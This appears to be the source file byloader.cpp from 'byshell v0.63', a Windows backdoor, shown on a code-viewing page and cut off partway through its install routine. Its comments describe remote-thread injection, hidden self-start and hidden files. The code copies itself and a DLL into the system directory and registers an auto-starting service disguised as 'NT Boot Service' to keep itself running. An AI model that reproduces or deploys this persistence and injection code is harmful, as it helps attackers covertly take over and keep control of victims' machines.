📄 byloader.cpp
字号:
//byshell v0.63,remote thread + hidden self start + hidden file
//记得改名为ntboot.exe
/**************************************************************
redesign pack header,BYheader for all instance for reliable trans.
16 BYTE password
8 BYTE reserved
4 BYTE packnum
4 BYTE packlength
解决:密码(drop conn),分片(solve here),丢包,错包(pass an "packet dropped\n" to work)
***************************************************************/
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
#include <winsock2.h>
#include <stdlib.h>
#include <tlhelp32.h>
#include <Ws2tcpip.h>
#include <time.h>
#include <string.h>
//1Q subsystem
//genernal work function need,"work.h"
//define a external struct for shell ,get/put,DOS
//passdump only in 9x
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;
void WINAPI CmdStart(DWORD,LPTSTR *);
void WINAPI CmdControl(DWORD);DWORD WINAPI CmdService(LPVOID);
void InstallCmdService(void);
void RemoveCmdService(void);
void injcode();
struct INJAPISTR{
HINSTANCE (__stdcall*myLoadLibrary)(LPCTSTR);
FARPROC (__stdcall*myGetProcAddress)(HMODULE,LPCTSTR);
LPVOID (__stdcall*myVirtualAlloc)(LPVOID lpAddress,DWORD dwSize,DWORD flAllocationType,DWORD flProtect);
BOOL (__stdcall*myFreeLibrary)(HMODULE hLibModule);
BOOL (__stdcall*myIsBadReadPtr)(CONST VOID *lp,UINT ucb);
BOOL (__stdcall*myVirtualFree)(LPVOID lpAddress,DWORD dwSize,DWORD dwFreeType);
}injapistr;
int main(int argc,char *argv[])
{
SERVICE_TABLE_ENTRY DispatchTable[] =
{
{"NtBoot",CmdStart},
{NULL ,NULL }
};
if(argc==2)
{
if(!stricmp(argv[1],"-install"))
{
InstallCmdService();return 0;
}
else if(!stricmp(argv[1],"-remove"))
{
RemoveCmdService();return 0;
}
else
{
printf("invailid parameter\n");return 0;
}
}
//MessageBox(0,"","",0); //from this we know that we can do sth before StartServiceCtrlDispatcher
//so we just create a fake service,and exec our inj code here!
//injcode();//no.we find problem
StartServiceCtrlDispatcher(DispatchTable);
return 0;
}
void WINAPI CmdStart(DWORD dwArgc,LPTSTR *lpArgv)
{
HANDLE hThread;
ServiceStatus.dwServiceType = SERVICE_WIN32;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_PAUSE_CONTINUE|SERVICE_ACCEPT_STOP ;
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
ServiceStatusHandle=RegisterServiceCtrlHandler("NtBoot",CmdControl);
if(ServiceStatusHandle==0)
{
return ;
}
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
{
return ;
}
hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
return ;
}
void WINAPI CmdControl(DWORD dwCode)
{
switch(dwCode)
{
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_STOP:
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
return ;
case SERVICE_CONTROL_INTERROGATE:
break;
default:
break;
}
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
return ;
}
void InstallCmdService(void)
{char formerpath[255];char syspath[255];int ret;
ret=GetModuleFileName(0,formerpath,256);
GetSystemDirectory(syspath,256);
CopyFile(formerpath,strcat(syspath,"\\ntboot.exe"),0);
strcpy(formerpath+ret-10,"ntboot.dll");
GetSystemDirectory(syspath,256);
CopyFile(formerpath,strcat(syspath,"\\ntboot.dll"),0);
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpCurrentPath[MAX_PATH];
char lpImagePath[MAX_PATH];
WIN32_FIND_DATA FileData;
HANDLE hSearch;
DWORD dwErrorCode;
SERVICE_STATUS InstallServiceStatus;
//check if exist
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath,"\\ntboot.exe");
hSearch=FindFirstFile(lpImagePath,&FileData);
printf("Copying file ... ");
if(hSearch==INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==5)
{
printf("Failure ... Access is Denied !\n");
}
else
{
printf("Failure !\n");
}
return ;
}
else
{
printf("Success !\n");
}
}
else
{
printf("already Exists !\n");
FindClose(hSearch);
}
schSCManager=OpenSCManager(0,NULL,SC_MANAGER_ALL_ACCESS);
printf("Creating Service .... ");
schService=CreateService(schSCManager,"NtBoot","NT Boot Service",SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,"ntboot.exe",NULL,NULL,NULL,NULL,NULL);
if(schService==NULL)
{
dwErrorCode=GetLastError();
if(dwErrorCode!=ERROR_SERVICE_EXISTS)
{
printf("Failure !\n");
CloseServiceHandle(schSCManager);
return ;
}
else
{
printf("already Exists !\n");
schService=OpenService(schSCManager,"ntboot",SERVICE_START);
if(schService==NULL)
{
printf("Opening Service .... Failure !\n");
CloseServiceHandle(schSCManager);
return ;
}
}
}
else
{
printf("Success !\n");
}
printf("Starting Service .... ");
if(StartService(schService,0,NULL)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
{
printf("already Running !\n");
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
}
else
{
printf("Pending ... ");
}
while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)
{
if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
{
Sleep(100);
}
else
{
break;
}
}
if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)
{
printf("Failure !\n");
}
else
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -